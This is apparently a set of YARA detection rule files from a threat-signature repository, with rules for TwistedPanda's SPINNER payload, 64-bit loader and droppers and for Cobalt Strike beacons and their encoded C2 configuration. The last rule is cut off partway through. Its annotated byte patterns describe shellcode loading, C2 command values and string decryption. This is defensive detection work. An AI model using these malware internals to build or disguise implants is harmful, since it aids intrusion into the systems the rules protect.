author = "Check Point Research"
description = "Detects an older variant of SPINNER payload used by TwistedPanda"
date = "2022-04-14"
reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
score = 80
hash1 = "28ecd1127bac08759d018787484b1bd16213809a2cc414514dc1ea87eb4c5ab8"
id = "bbbf3af1-127f-5d32-967f-bdb94311d1d6"
strings:
// C7 ?? ?? ?? 00 00 00 mov dword ptr [eax+??], ??
// C7 ?? ?? ?? 00 00 00 mov dword ptr [eax+??], ??
// C6 mov byte ptr [eax], 0
$config_init = { C7 [3] 00 00 00 C7 [3] 00 00 00 C6 }
$c2_cmd_1 = { 01 00 03 10 }
$c2_cmd_2 = { 02 00 01 10 }
$c2_cmd_3 = { 01 00 01 10 }
$c2_cmd_4 = { 01 00 00 10 }
$c2_cmd_5 = { 02 00 00 10 }
// 80 B3 ?? ?? ?? ?? ?? xor ds:dd_encrypted_url[ebx], 50h
// 8D BB ?? ?? ?? ?? lea edi, dd_encrypted_url[ebx]
// 8B 56 14 mov edx, [esi+14h]
// 8B C2 mov eax, edx
// 8B 4E 10 mov ecx, [esi+10h]
// 2B C1 sub eax, ecx
// 83 F8 01 cmp eax, 1
$decryption = { 80 B3 [5] 8D BB [4] 8B 56 14 8B C2 8B 4E 10 2B C1 83 F8 01 }
condition:
// MZ signature at offset 0 and ...
uint16(0) == 0x5A4D and
// ... PE signature at offset stored in MZ header at 0x3C
uint32(uint32(0x3C)) == 0x00004550 and
filesize < 3000KB and #config_init > 10 and 2 of ($c2_cmd_*) and $decryption
}
rule APT_CN_TwistedPanda_64bit_Loader {
meta:
author = "Check Point Research"
description = "Detects the 64bit Loader DLL used by TwistedPanda"
date = "2022-04-14"
reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
score = 80
hash1 = "e0d4ef7190ff50e6ad2a2403c87cc37254498e8cc5a3b2b8798983b1b3cdc94f"
id = "2172dd33-204b-5a05-ad26-534a0c1d7a17"
strings:
// 48 8D ?? ?? ?? ?? ?? ?? ?? lea rdx, ds:2[rdx*2]
// 48 8B C1 mov rax, rcx
// 48 81 ?? ?? ?? ?? ?? cmp rdx, 1000h
// 72 ?? jb short loc_7FFDF0BA1B48
$path_check = { 48 8D [6] 48 8B ?? 48 81 [5] 72 }
// 48 8B D0 mov rdx, rax ; lpBuffer
// 41 B8 F0 16 00 00 mov r8d, 16F0h ; nNumberOfBytesToRead
// 48 8B CF mov rcx, rdi ; hFile
// 48 8B D8 mov rbx, rax
// FF ?? ?? ?? ?? call cs:ReadFile
$shellcode_read = { 48 8B D0 41 B8 F0 16 00 00 48 8B CF 48 8B D8 FF}
// BA F0 16 00 00 mov edx, 16F0h ; dwSize
// 44 8D 4E 40 lea r9d, [rsi+40h] ; flProtect
// 33 C9 xor ecx, ecx ; lpAddress
// 41 B8 00 30 00 00 mov r8d, 3000h ; flAllocationType
// FF ?? ?? ?? ?? ?? call cs:VirtualAlloc
$shellcode_allocate = { BA F0 16 00 00 44 8D 4E 40 33 C9 41 B8 00 30 00 00 FF }
condition:
// MZ signature at offset 0 and ...
uint16(0) == 0x5A4D and
// ... PE signature at offset stored in MZ header at 0x3C
uint32(uint32(0x3C)) == 0x00004550 and
filesize < 3000KB and $path_check and $shellcode_allocate and $shellcode_read
}
rule APT_CN_TwistedPanda_droppers {
meta:
author = "Check Point Research"
description = "Detects droppers used by TwistedPanda"
date = "2022-04-14"
reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
score = 80
hash1 = "59dea38da6e515af45d6df68f8959601e2bbf0302e35b7989e741e9aba2f0291"
hash2 = "8b04479fdf22892cdfebd6e6fbed180701e036806ed0ddbe79f0b29f73449248"
hash3 = "f29a0cda6e56fc0e26efa3b6628c6bcaa0819a3275a10e9da2a8517778152d66"
id = "f61c8b97-5870-5837-942f-f1650870960a"
strings:
// 81 FA ?? ?? ?? ?? cmp edx, 4BED1896h
// 75 ?? jnz short loc_140001829
// E8 ?? ?? ?? ?? call sub_1400019D0
// 48 89 05 ?? ?? ?? ?? mov cs:qword_14001ED38, rax
// E? ?? ?? ?? ?? jmp loc_1400018DD
$switch_control = { 81 FA [4] 75 ?? E8 [4] 48 89 05 [4] E? }
// 41 0F ?? ?? movsx edx, byte ptr [r9]
// 44 ?? ?? or r8d, edx
// 41 ?? ?? 03 rol r8d, 3
// 41 81 ?? ?? ?? ?? ?? xor r8d, 0EF112233h
// 41 ?? ?? mov eax, r10d
$byte_manipulation = { 41 0F [2] 44 [2] 41 [2] 03 41 81 [5] 41 }
// %public%
$stack_strings_1 = { 25 00 70 00 }
$stack_strings_2 = { 75 00 62 00 }
$stack_strings_3 = { 6C 00 69 00 }
$stack_strings_4 = { 63 00 25 00 }
condition:
// MZ signature at offset 0 and ...
uint16(0) == 0x5A4D and
// ... PE signature at offset stored in MZ header at 0x3C
uint32(uint32(0x3C)) == 0x00004550 and
filesize < 3000KB and #switch_control > 8 and all of ($stack_strings_*) and $byte_manipulation
}

View file

@ -0,0 +1,122 @@
/*
LICENSE
Copyright (C) 2015 JPCERT Coordination Center. All Rights Reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following acknowledgments and disclaimers.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following acknowledgments and disclaimers
in the documentation and/or other materials provided with the distribution.
3. Products derived from this software may not include "JPCERT Coordination
Center" in the name of such derived product, nor shall "JPCERT
Coordination Center" be used to endorse or promote products derived
from this software without prior written permission. For written
permission, please contact pr@jpcert.or.jp.
ACKNOWLEDGMENTS AND DISCLAIMERS
Copyright (C) 2015 JPCERT Coordination Center
This software is based upon work funded and supported by the Ministry of
Economy, Trade and Industry.
Any opinions, findings and conclusions or recommendations expressed in this
software are those of the author(s) and do not necessarily reflect the views
of the Ministry of Economy, Trade and Industry.
NO WARRANTY. THIS JPCERT COORDINATION CENTER SOFTWARE IS FURNISHED ON
AN "AS-IS" BASIS. JPCERT COORDINATION CENTER MAKES NO WARRANTIES OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, AS TO ANY MATTER INCLUDING, BUT
NOT LIMITED TO, WARRANTY OF FITNESS FOR PURPOSE OR MERCHANTABILITY,
EXCLUSIVITY, OR RESULTS OBTAINED FROM USE OF THE SOFTWARE. JPCERT
COORDINATION CENTER DOES NOT MAKE ANY WARRANTY OF ANY KIND WITH
RESPECT TO FREEDOM FROM PATENT, TRADEMARK, OR COPYRIGHT INFRINGEMENT.
This software has been approved for public release and unlimited distribution.
*/
rule APT_CobaltStrike_Beacon_Indicator {
meta:
description = "Detects CobaltStrike beacons"
author = "JPCERT"
reference = "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py"
date = "2018-11-09"
id = "8508c7a0-0131-59b1-b537-a6d1c6cb2b35"
strings:
$v1 = { 73 70 72 6E 67 00 }
$v2 = { 69 69 69 69 69 69 69 69 }
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
rule HKTL_CobaltStrike_Beacon_Strings {
meta:
author = "Elastic"
description = "Identifies strings used in Cobalt Strike Beacon DLL"
reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
date = "2021-03-16"
id = "af558aa2-a3dc-5a7a-bc74-42bb2246091c"
strings:
$s1 = "%02d/%02d/%02d %02d:%02d:%02d"
$s2 = "Started service %s on %s"
$s3 = "%s as %s\\%s: %d"
condition:
2 of them
}
rule HKTL_CobaltStrike_Beacon_XOR_Strings {
meta:
author = "Elastic"
description = "Identifies XOR'd strings used in Cobalt Strike Beacon DLL"
reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
date = "2021-03-16"
/* Used for beacon config decoding in THOR */
xor_s1 = "%02d/%02d/%02d %02d:%02d:%02d"
xor_s2 = "Started service %s on %s"
xor_s3 = "%s as %s\\%s: %d"
id = "359160a8-cf1c-58a8-bf7f-c09a8d661308"
strings:
$s1 = "%02d/%02d/%02d %02d:%02d:%02d" xor(0x01-0xff)
$s2 = "Started service %s on %s" xor(0x01-0xff)
$s3 = "%s as %s\\%s: %d" xor(0x01-0xff)
$fp1 = "MalwareRemovalTool"
condition:
2 of ($s*) and not 1 of ($fp*)
}
rule HKTL_CobaltStrike_Beacon_4_2_Decrypt {
meta:
author = "Elastic"
description = "Identifies deobfuscation routine used in Cobalt Strike Beacon DLL version 4.2"
reference = "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures"
date = "2021-03-16"
id = "63b71eef-0af5-5765-b957-ccdc9dde053b"
strings:
$a_x64 = {4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03}
$a_x86 = {8B 46 04 8B 08 8B 50 04 83 C0 08 89 55 08 89 45 0C 85 C9 75 04 85 D2 74 23 3B CA 73 E6 8B 06 8D 3C 08 33 D2}
condition:
any of them
}
rule HKTL_Win_CobaltStrike : Commodity {
meta:
author = "threatintel@volexity.com"
date = "2021-05-25"
description = "The CobaltStrike malware family."
hash = "b041efb8ba2a88a3d172f480efa098d72eef13e42af6aa5fb838e6ccab500a7c"
reference = "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/"
id = "113ba304-261f-5c59-bc56-57515c239b6d"
strings:
$s1 = "%s (admin)" fullword
$s2 = {48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 2D 73 74 72 65 61 6D 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 0D 0A 0D 0A 00}
$s3 = "%02d/%02d/%02d %02d:%02d:%02d" fullword
$s4 = "%s as %s\\%s: %d" fullword
$s5 = "%s&%s=%s" fullword
$s6 = "rijndael" fullword
$s7 = "(null)"
condition:
all of them
}

View file

@ -0,0 +1,320 @@
rule CobaltStrike_C2_Host_Indicator {
meta:
description = "Detects CobaltStrike C2 host artifacts"
author = "yara@s3c.za.net"
date = "2019-08-16"
id = "7f15ee30-664e-59b8-9e31-35d88e58a45e"
strings:
$c2_indicator_fp = "#Host: %s"
$c2_indicator = "#Host:"
condition:
$c2_indicator and not $c2_indicator_fp
and not uint32(0) == 0x0a786564
and not uint32(0) == 0x0a796564
}
rule CobaltStrike_Sleep_Decoder_Indicator {
meta:
description = "Detects CobaltStrike sleep_mask decoder"
author = "yara@s3c.za.net"
date = "2021-07-19"
id = "d5b53d68-55f9-5837-9b0c-e7be2f3bd072"
strings:
$sleep_decoder = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 }
condition:
$sleep_decoder
}
rule CobaltStrike_C2_Encoded_XOR_Config_Indicator {
meta:
description = "Detects CobaltStrike C2 encoded profile configuration"
author = "yara@s3c.za.net"
date = "2021-07-08"
id = "8e33c63d-eaba-5851-88f4-ef7261a0a618"
strings:
$s000 = { 00 01 00 01 00 02 ?? ?? 00 02 00 01 00 02 ?? ?? 00 03 00 02 00 04 ?? ?? ?? ?? 00 04 00 02 00 04 ?? ?? ?? ?? 00 05 00 01 00 02 ?? ?? }
$s001 = { 01 00 01 00 01 03 ?? ?? 01 03 01 00 01 03 ?? ?? 01 02 01 03 01 05 ?? ?? ?? ?? 01 05 01 03 01 05 ?? ?? ?? ?? 01 04 01 00 01 03 ?? ?? }
$s002 = { 02 03 02 03 02 00 ?? ?? 02 00 02 03 02 00 ?? ?? 02 01 02 00 02 06 ?? ?? ?? ?? 02 06 02 00 02 06 ?? ?? ?? ?? 02 07 02 03 02 00 ?? ?? }
$s003 = { 03 02 03 02 03 01 ?? ?? 03 01 03 02 03 01 ?? ?? 03 00 03 01 03 07 ?? ?? ?? ?? 03 07 03 01 03 07 ?? ?? ?? ?? 03 06 03 02 03 01 ?? ?? }
$s004 = { 04 05 04 05 04 06 ?? ?? 04 06 04 05 04 06 ?? ?? 04 07 04 06 04 00 ?? ?? ?? ?? 04 00 04 06 04 00 ?? ?? ?? ?? 04 01 04 05 04 06 ?? ?? }
$s005 = { 05 04 05 04 05 07 ?? ?? 05 07 05 04 05 07 ?? ?? 05 06 05 07 05 01 ?? ?? ?? ?? 05 01 05 07 05 01 ?? ?? ?? ?? 05 00 05 04 05 07 ?? ?? }
$s006 = { 06 07 06 07 06 04 ?? ?? 06 04 06 07 06 04 ?? ?? 06 05 06 04 06 02 ?? ?? ?? ?? 06 02 06 04 06 02 ?? ?? ?? ?? 06 03 06 07 06 04 ?? ?? }
$s007 = { 07 06 07 06 07 05 ?? ?? 07 05 07 06 07 05 ?? ?? 07 04 07 05 07 03 ?? ?? ?? ?? 07 03 07 05 07 03 ?? ?? ?? ?? 07 02 07 06 07 05 ?? ?? }
$s008 = { 08 09 08 09 08 0A ?? ?? 08 0A 08 09 08 0A ?? ?? 08 0B 08 0A 08 0C ?? ?? ?? ?? 08 0C 08 0A 08 0C ?? ?? ?? ?? 08 0D 08 09 08 0A ?? ?? }
$s009 = { 09 08 09 08 09 0B ?? ?? 09 0B 09 08 09 0B ?? ?? 09 0A 09 0B 09 0D ?? ?? ?? ?? 09 0D 09 0B 09 0D ?? ?? ?? ?? 09 0C 09 08 09 0B ?? ?? }
$s010 = { 0A 0B 0A 0B 0A 08 ?? ?? 0A 08 0A 0B 0A 08 ?? ?? 0A 09 0A 08 0A 0E ?? ?? ?? ?? 0A 0E 0A 08 0A 0E ?? ?? ?? ?? 0A 0F 0A 0B 0A 08 ?? ?? }
$s011 = { 0B 0A 0B 0A 0B 09 ?? ?? 0B 09 0B 0A 0B 09 ?? ?? 0B 08 0B 09 0B 0F ?? ?? ?? ?? 0B 0F 0B 09 0B 0F ?? ?? ?? ?? 0B 0E 0B 0A 0B 09 ?? ?? }
$s012 = { 0C 0D 0C 0D 0C 0E ?? ?? 0C 0E 0C 0D 0C 0E ?? ?? 0C 0F 0C 0E 0C 08 ?? ?? ?? ?? 0C 08 0C 0E 0C 08 ?? ?? ?? ?? 0C 09 0C 0D 0C 0E ?? ?? }
$s013 = { 0D 0C 0D 0C 0D 0F ?? ?? 0D 0F 0D 0C 0D 0F ?? ?? 0D 0E 0D 0F 0D 09 ?? ?? ?? ?? 0D 09 0D 0F 0D 09 ?? ?? ?? ?? 0D 08 0D 0C 0D 0F ?? ?? }
$s014 = { 0E 0F 0E 0F 0E 0C ?? ?? 0E 0C 0E 0F 0E 0C ?? ?? 0E 0D 0E 0C 0E 0A ?? ?? ?? ?? 0E 0A 0E 0C 0E 0A ?? ?? ?? ?? 0E 0B 0E 0F 0E 0C ?? ?? }
$s015 = { 0F 0E 0F 0E 0F 0D ?? ?? 0F 0D 0F 0E 0F 0D ?? ?? 0F 0C 0F 0D 0F 0B ?? ?? ?? ?? 0F 0B 0F 0D 0F 0B ?? ?? ?? ?? 0F 0A 0F 0E 0F 0D ?? ?? }
$s016 = { 10 11 10 11 10 12 ?? ?? 10 12 10 11 10 12 ?? ?? 10 13 10 12 10 14 ?? ?? ?? ?? 10 14 10 12 10 14 ?? ?? ?? ?? 10 15 10 11 10 12 ?? ?? }
$s017 = { 11 10 11 10 11 13 ?? ?? 11 13 11 10 11 13 ?? ?? 11 12 11 13 11 15 ?? ?? ?? ?? 11 15 11 13 11 15 ?? ?? ?? ?? 11 14 11 10 11 13 ?? ?? }
$s018 = { 12 13 12 13 12 10 ?? ?? 12 10 12 13 12 10 ?? ?? 12 11 12 10 12 16 ?? ?? ?? ?? 12 16 12 10 12 16 ?? ?? ?? ?? 12 17 12 13 12 10 ?? ?? }
$s019 = { 13 12 13 12 13 11 ?? ?? 13 11 13 12 13 11 ?? ?? 13 10 13 11 13 17 ?? ?? ?? ?? 13 17 13 11 13 17 ?? ?? ?? ?? 13 16 13 12 13 11 ?? ?? }
$s020 = { 14 15 14 15 14 16 ?? ?? 14 16 14 15 14 16 ?? ?? 14 17 14 16 14 10 ?? ?? ?? ?? 14 10 14 16 14 10 ?? ?? ?? ?? 14 11 14 15 14 16 ?? ?? }
$s021 = { 15 14 15 14 15 17 ?? ?? 15 17 15 14 15 17 ?? ?? 15 16 15 17 15 11 ?? ?? ?? ?? 15 11 15 17 15 11 ?? ?? ?? ?? 15 10 15 14 15 17 ?? ?? }
$s022 = { 16 17 16 17 16 14 ?? ?? 16 14 16 17 16 14 ?? ?? 16 15 16 14 16 12 ?? ?? ?? ?? 16 12 16 14 16 12 ?? ?? ?? ?? 16 13 16 17 16 14 ?? ?? }
$s023 = { 17 16 17 16 17 15 ?? ?? 17 15 17 16 17 15 ?? ?? 17 14 17 15 17 13 ?? ?? ?? ?? 17 13 17 15 17 13 ?? ?? ?? ?? 17 12 17 16 17 15 ?? ?? }
$s024 = { 18 19 18 19 18 1A ?? ?? 18 1A 18 19 18 1A ?? ?? 18 1B 18 1A 18 1C ?? ?? ?? ?? 18 1C 18 1A 18 1C ?? ?? ?? ?? 18 1D 18 19 18 1A ?? ?? }
$s025 = { 19 18 19 18 19 1B ?? ?? 19 1B 19 18 19 1B ?? ?? 19 1A 19 1B 19 1D ?? ?? ?? ?? 19 1D 19 1B 19 1D ?? ?? ?? ?? 19 1C 19 18 19 1B ?? ?? }
$s026 = { 1A 1B 1A 1B 1A 18 ?? ?? 1A 18 1A 1B 1A 18 ?? ?? 1A 19 1A 18 1A 1E ?? ?? ?? ?? 1A 1E 1A 18 1A 1E ?? ?? ?? ?? 1A 1F 1A 1B 1A 18 ?? ?? }
$s027 = { 1B 1A 1B 1A 1B 19 ?? ?? 1B 19 1B 1A 1B 19 ?? ?? 1B 18 1B 19 1B 1F ?? ?? ?? ?? 1B 1F 1B 19 1B 1F ?? ?? ?? ?? 1B 1E 1B 1A 1B 19 ?? ?? }
$s028 = { 1C 1D 1C 1D 1C 1E ?? ?? 1C 1E 1C 1D 1C 1E ?? ?? 1C 1F 1C 1E 1C 18 ?? ?? ?? ?? 1C 18 1C 1E 1C 18 ?? ?? ?? ?? 1C 19 1C 1D 1C 1E ?? ?? }
$s029 = { 1D 1C 1D 1C 1D 1F ?? ?? 1D 1F 1D 1C 1D 1F ?? ?? 1D 1E 1D 1F 1D 19 ?? ?? ?? ?? 1D 19 1D 1F 1D 19 ?? ?? ?? ?? 1D 18 1D 1C 1D 1F ?? ?? }
$s030 = { 1E 1F 1E 1F 1E 1C ?? ?? 1E 1C 1E 1F 1E 1C ?? ?? 1E 1D 1E 1C 1E 1A ?? ?? ?? ?? 1E 1A 1E 1C 1E 1A ?? ?? ?? ?? 1E 1B 1E 1F 1E 1C ?? ?? }
$s031 = { 1F 1E 1F 1E 1F 1D ?? ?? 1F 1D 1F 1E 1F 1D ?? ?? 1F 1C 1F 1D 1F 1B ?? ?? ?? ?? 1F 1B 1F 1D 1F 1B ?? ?? ?? ?? 1F 1A 1F 1E 1F 1D ?? ?? }
$s032 = { 20 21 20 21 20 22 ?? ?? 20 22 20 21 20 22 ?? ?? 20 23 20 22 20 24 ?? ?? ?? ?? 20 24 20 22 20 24 ?? ?? ?? ?? 20 25 20 21 20 22 ?? ?? }
$s033 = { 21 20 21 20 21 23 ?? ?? 21 23 21 20 21 23 ?? ?? 21 22 21 23 21 25 ?? ?? ?? ?? 21 25 21 23 21 25 ?? ?? ?? ?? 21 24 21 20 21 23 ?? ?? }
$s034 = { 22 23 22 23 22 20 ?? ?? 22 20 22 23 22 20 ?? ?? 22 21 22 20 22 26 ?? ?? ?? ?? 22 26 22 20 22 26 ?? ?? ?? ?? 22 27 22 23 22 20 ?? ?? }
$s035 = { 23 22 23 22 23 21 ?? ?? 23 21 23 22 23 21 ?? ?? 23 20 23 21 23 27 ?? ?? ?? ?? 23 27 23 21 23 27 ?? ?? ?? ?? 23 26 23 22 23 21 ?? ?? }
$s036 = { 24 25 24 25 24 26 ?? ?? 24 26 24 25 24 26 ?? ?? 24 27 24 26 24 20 ?? ?? ?? ?? 24 20 24 26 24 20 ?? ?? ?? ?? 24 21 24 25 24 26 ?? ?? }
$s037 = { 25 24 25 24 25 27 ?? ?? 25 27 25 24 25 27 ?? ?? 25 26 25 27 25 21 ?? ?? ?? ?? 25 21 25 27 25 21 ?? ?? ?? ?? 25 20 25 24 25 27 ?? ?? }
$s038 = { 26 27 26 27 26 24 ?? ?? 26 24 26 27 26 24 ?? ?? 26 25 26 24 26 22 ?? ?? ?? ?? 26 22 26 24 26 22 ?? ?? ?? ?? 26 23 26 27 26 24 ?? ?? }
$s039 = { 27 26 27 26 27 25 ?? ?? 27 25 27 26 27 25 ?? ?? 27 24 27 25 27 23 ?? ?? ?? ?? 27 23 27 25 27 23 ?? ?? ?? ?? 27 22 27 26 27 25 ?? ?? }
$s040 = { 28 29 28 29 28 2A ?? ?? 28 2A 28 29 28 2A ?? ?? 28 2B 28 2A 28 2C ?? ?? ?? ?? 28 2C 28 2A 28 2C ?? ?? ?? ?? 28 2D 28 29 28 2A ?? ?? }
$s041 = { 29 28 29 28 29 2B ?? ?? 29 2B 29 28 29 2B ?? ?? 29 2A 29 2B 29 2D ?? ?? ?? ?? 29 2D 29 2B 29 2D ?? ?? ?? ?? 29 2C 29 28 29 2B ?? ?? }
$s042 = { 2A 2B 2A 2B 2A 28 ?? ?? 2A 28 2A 2B 2A 28 ?? ?? 2A 29 2A 28 2A 2E ?? ?? ?? ?? 2A 2E 2A 28 2A 2E ?? ?? ?? ?? 2A 2F 2A 2B 2A 28 ?? ?? }
$s043 = { 2B 2A 2B 2A 2B 29 ?? ?? 2B 29 2B 2A 2B 29 ?? ?? 2B 28 2B 29 2B 2F ?? ?? ?? ?? 2B 2F 2B 29 2B 2F ?? ?? ?? ?? 2B 2E 2B 2A 2B 29 ?? ?? }
$s044 = { 2C 2D 2C 2D 2C 2E ?? ?? 2C 2E 2C 2D 2C 2E ?? ?? 2C 2F 2C 2E 2C 28 ?? ?? ?? ?? 2C 28 2C 2E 2C 28 ?? ?? ?? ?? 2C 29 2C 2D 2C 2E ?? ?? }
$s045 = { 2D 2C 2D 2C 2D 2F ?? ?? 2D 2F 2D 2C 2D 2F ?? ?? 2D 2E 2D 2F 2D 29 ?? ?? ?? ?? 2D 29 2D 2F 2D 29 ?? ?? ?? ?? 2D 28 2D 2C 2D 2F ?? ?? }
$s046 = { 2E 2F 2E 2F 2E 2C ?? ?? 2E 2C 2E 2F 2E 2C ?? ?? 2E 2D 2E 2C 2E 2A ?? ?? ?? ?? 2E 2A 2E 2C 2E 2A ?? ?? ?? ?? 2E 2B 2E 2F 2E 2C ?? ?? }
$s047 = { 2F 2E 2F 2E 2F 2D ?? ?? 2F 2D 2F 2E 2F 2D ?? ?? 2F 2C 2F 2D 2F 2B ?? ?? ?? ?? 2F 2B 2F 2D 2F 2B ?? ?? ?? ?? 2F 2A 2F 2E 2F 2D ?? ?? }
$s048 = { 30 31 30 31 30 32 ?? ?? 30 32 30 31 30 32 ?? ?? 30 33 30 32 30 34 ?? ?? ?? ?? 30 34 30 32 30 34 ?? ?? ?? ?? 30 35 30 31 30 32 ?? ?? }
$s049 = { 31 30 31 30 31 33 ?? ?? 31 33 31 30 31 33 ?? ?? 31 32 31 33 31 35 ?? ?? ?? ?? 31 35 31 33 31 35 ?? ?? ?? ?? 31 34 31 30 31 33 ?? ?? }
$s050 = { 32 33 32 33 32 30 ?? ?? 32 30 32 33 32 30 ?? ?? 32 31 32 30 32 36 ?? ?? ?? ?? 32 36 32 30 32 36 ?? ?? ?? ?? 32 37 32 33 32 30 ?? ?? }
$s051 = { 33 32 33 32 33 31 ?? ?? 33 31 33 32 33 31 ?? ?? 33 30 33 31 33 37 ?? ?? ?? ?? 33 37 33 31 33 37 ?? ?? ?? ?? 33 36 33 32 33 31 ?? ?? }
$s052 = { 34 35 34 35 34 36 ?? ?? 34 36 34 35 34 36 ?? ?? 34 37 34 36 34 30 ?? ?? ?? ?? 34 30 34 36 34 30 ?? ?? ?? ?? 34 31 34 35 34 36 ?? ?? }
$s053 = { 35 34 35 34 35 37 ?? ?? 35 37 35 34 35 37 ?? ?? 35 36 35 37 35 31 ?? ?? ?? ?? 35 31 35 37 35 31 ?? ?? ?? ?? 35 30 35 34 35 37 ?? ?? }
$s054 = { 36 37 36 37 36 34 ?? ?? 36 34 36 37 36 34 ?? ?? 36 35 36 34 36 32 ?? ?? ?? ?? 36 32 36 34 36 32 ?? ?? ?? ?? 36 33 36 37 36 34 ?? ?? }
$s055 = { 37 36 37 36 37 35 ?? ?? 37 35 37 36 37 35 ?? ?? 37 34 37 35 37 33 ?? ?? ?? ?? 37 33 37 35 37 33 ?? ?? ?? ?? 37 32 37 36 37 35 ?? ?? }
$s056 = { 38 39 38 39 38 3A ?? ?? 38 3A 38 39 38 3A ?? ?? 38 3B 38 3A 38 3C ?? ?? ?? ?? 38 3C 38 3A 38 3C ?? ?? ?? ?? 38 3D 38 39 38 3A ?? ?? }
$s057 = { 39 38 39 38 39 3B ?? ?? 39 3B 39 38 39 3B ?? ?? 39 3A 39 3B 39 3D ?? ?? ?? ?? 39 3D 39 3B 39 3D ?? ?? ?? ?? 39 3C 39 38 39 3B ?? ?? }
$s058 = { 3A 3B 3A 3B 3A 38 ?? ?? 3A 38 3A 3B 3A 38 ?? ?? 3A 39 3A 38 3A 3E ?? ?? ?? ?? 3A 3E 3A 38 3A 3E ?? ?? ?? ?? 3A 3F 3A 3B 3A 38 ?? ?? }
$s059 = { 3B 3A 3B 3A 3B 39 ?? ?? 3B 39 3B 3A 3B 39 ?? ?? 3B 38 3B 39 3B 3F ?? ?? ?? ?? 3B 3F 3B 39 3B 3F ?? ?? ?? ?? 3B 3E 3B 3A 3B 39 ?? ?? }
$s060 = { 3C 3D 3C 3D 3C 3E ?? ?? 3C 3E 3C 3D 3C 3E ?? ?? 3C 3F 3C 3E 3C 38 ?? ?? ?? ?? 3C 38 3C 3E 3C 38 ?? ?? ?? ?? 3C 39 3C 3D 3C 3E ?? ?? }
$s061 = { 3D 3C 3D 3C 3D 3F ?? ?? 3D 3F 3D 3C 3D 3F ?? ?? 3D 3E 3D 3F 3D 39 ?? ?? ?? ?? 3D 39 3D 3F 3D 39 ?? ?? ?? ?? 3D 38 3D 3C 3D 3F ?? ?? }
$s062 = { 3E 3F 3E 3F 3E 3C ?? ?? 3E 3C 3E 3F 3E 3C ?? ?? 3E 3D 3E 3C 3E 3A ?? ?? ?? ?? 3E 3A 3E 3C 3E 3A ?? ?? ?? ?? 3E 3B 3E 3F 3E 3C ?? ?? }
$s063 = { 3F 3E 3F 3E 3F 3D ?? ?? 3F 3D 3F 3E 3F 3D ?? ?? 3F 3C 3F 3D 3F 3B ?? ?? ?? ?? 3F 3B 3F 3D 3F 3B ?? ?? ?? ?? 3F 3A 3F 3E 3F 3D ?? ?? }
$s064 = { 40 41 40 41 40 42 ?? ?? 40 42 40 41 40 42 ?? ?? 40 43 40 42 40 44 ?? ?? ?? ?? 40 44 40 42 40 44 ?? ?? ?? ?? 40 45 40 41 40 42 ?? ?? }
$s065 = { 41 40 41 40 41 43 ?? ?? 41 43 41 40 41 43 ?? ?? 41 42 41 43 41 45 ?? ?? ?? ?? 41 45 41 43 41 45 ?? ?? ?? ?? 41 44 41 40 41 43 ?? ?? }
$s066 = { 42 43 42 43 42 40 ?? ?? 42 40 42 43 42 40 ?? ?? 42 41 42 40 42 46 ?? ?? ?? ?? 42 46 42 40 42 46 ?? ?? ?? ?? 42 47 42 43 42 40 ?? ?? }
$s067 = { 43 42 43 42 43 41 ?? ?? 43 41 43 42 43 41 ?? ?? 43 40 43 41 43 47 ?? ?? ?? ?? 43 47 43 41 43 47 ?? ?? ?? ?? 43 46 43 42 43 41 ?? ?? }
$s068 = { 44 45 44 45 44 46 ?? ?? 44 46 44 45 44 46 ?? ?? 44 47 44 46 44 40 ?? ?? ?? ?? 44 40 44 46 44 40 ?? ?? ?? ?? 44 41 44 45 44 46 ?? ?? }
$s069 = { 45 44 45 44 45 47 ?? ?? 45 47 45 44 45 47 ?? ?? 45 46 45 47 45 41 ?? ?? ?? ?? 45 41 45 47 45 41 ?? ?? ?? ?? 45 40 45 44 45 47 ?? ?? }
$s070 = { 46 47 46 47 46 44 ?? ?? 46 44 46 47 46 44 ?? ?? 46 45 46 44 46 42 ?? ?? ?? ?? 46 42 46 44 46 42 ?? ?? ?? ?? 46 43 46 47 46 44 ?? ?? }
$s071 = { 47 46 47 46 47 45 ?? ?? 47 45 47 46 47 45 ?? ?? 47 44 47 45 47 43 ?? ?? ?? ?? 47 43 47 45 47 43 ?? ?? ?? ?? 47 42 47 46 47 45 ?? ?? }
$s072 = { 48 49 48 49 48 4A ?? ?? 48 4A 48 49 48 4A ?? ?? 48 4B 48 4A 48 4C ?? ?? ?? ?? 48 4C 48 4A 48 4C ?? ?? ?? ?? 48 4D 48 49 48 4A ?? ?? }
$s073 = { 49 48 49 48 49 4B ?? ?? 49 4B 49 48 49 4B ?? ?? 49 4A 49 4B 49 4D ?? ?? ?? ?? 49 4D 49 4B 49 4D ?? ?? ?? ?? 49 4C 49 48 49 4B ?? ?? }
$s074 = { 4A 4B 4A 4B 4A 48 ?? ?? 4A 48 4A 4B 4A 48 ?? ?? 4A 49 4A 48 4A 4E ?? ?? ?? ?? 4A 4E 4A 48 4A 4E ?? ?? ?? ?? 4A 4F 4A 4B 4A 48 ?? ?? }
